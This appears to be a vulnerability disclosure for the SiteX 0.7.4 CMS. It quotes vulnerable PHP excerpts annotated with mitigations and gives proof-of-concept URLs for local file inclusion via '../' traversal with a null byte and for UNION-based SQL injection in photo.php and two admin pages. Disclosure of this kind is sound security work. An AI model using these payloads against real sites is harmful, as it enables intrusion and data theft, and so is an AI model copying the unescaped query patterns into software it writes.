Уязвимости SiteX 0.7 Beta
Product: SiteX 0.7.4 build 405
PHPinfo exposure
Код:
http://localhost/setup/phpinfo.php
LFI
PHP код:
// LFI sink: with register_globals=on, $THEME_FOLDER is taken straight from the
// request, so the include path is attacker-controlled ("../" traversal); the
// trailing "%00" in the PoC relies on magic_quotes_gpc=off and a PHP build that
// still truncated paths at a NUL byte.
// Mitigation: resolve the theme name against an allow-list of installed themes
// (strict in_array on a fixed list, or basename() plus an existence check inside
// the themes directory) before it ever reaches include().
include("themes/$THEME_FOLDER/header.php");
Preconditions: magic_quotes=off, register_globals=on
Results:
Код:
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00
SQL Injection
magic_quotes=off, register_globals=on
photo.php
PHP код:
// SQL injection: $photoid and $albumid are interpolated into the query strings
// without escaping or casting; under register_globals=on they come directly from
// the request (see the photo.php PoC below, which breaks out of the quoted
// albumid value).
// Mitigation: cast both ids to int before use (they are only ever compared to an
// integer id column) or, better, move to parameterised queries.
$query = "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result = mysql_query($query, $Link) or queryError("11", mysql_error());
$sxPhoto = mysql_fetch_object($result);
// $sxPhoto->views is read from the row; if the SELECT matched nothing this is
// a property read on false (PHP notice) and the UPDATE below writes views='1'.
$sxNewViews = $sxPhoto->views + 1;
// The same unescaped $photoid is reused here, so the UPDATE is a second
// injection point with write semantics.
$sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error());
// Third interpolation: $albumid, likewise unescaped.
$queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error());
$ROWA = mysql_fetch_object($resultA);
Result:
Код:
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
PHP код:
// NOTE(review): this excerpt starts inside an enclosing block (the matching
// "}" follows below); $query on the first line is built above the excerpt.
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
// SQL injection (write path): $pageid is interpolated unescaped into a DELETE;
// with register_globals=on it is request-controlled.
$query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
// $private and $user_types are also plain globals here, so under
// register_globals they are request-controlled as well; $k (an array key) is
// interpolated into the INSERT without escaping.
if($private)
{
foreach ($user_types as $k => $v)
{
$query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
}
}
// $pageid is also placed unencoded into the Location header; urlencode() it
// (and cast to int where it is used as an id) so the redirect cannot carry
// arbitrary characters.
header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
die();
}
// SQL injection (read path, the one exercised by the PoC below): $pageid is
// interpolated into the SELECT unescaped. Mitigation: (int) cast or a
// parameterised query.
$query = "SELECT * FROM $DB_Pages WHERE id='$pageid'";
Result:
Код:
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+
admin/journal_edit.php
PHP код:
// SQL injection (write path): every value here ($title, $content, $timestamp,
// $date_month, $date_day, $date_year, $entryid) is interpolated without
// escaping; under register_globals=on they are request-controlled.
// Mitigation: parameterise the UPDATE, or at minimum escape each value and cast
// the id/date fields to int.
$query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
writeRSSXML();
// $entryid goes unencoded into the Location header; urlencode() it.
header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
die();
//$message = $sxLang['MessageJournalEdited'];
}
// SQL injection (read path, exercised by the PoC below): $entryid is
// interpolated unescaped into the SELECT. Mitigation: (int) cast or a
// parameterised query; the fetch below then runs against a trusted statement.
$query = "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
$ROW = mysql_fetch_object($result);
Result:
Код:
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+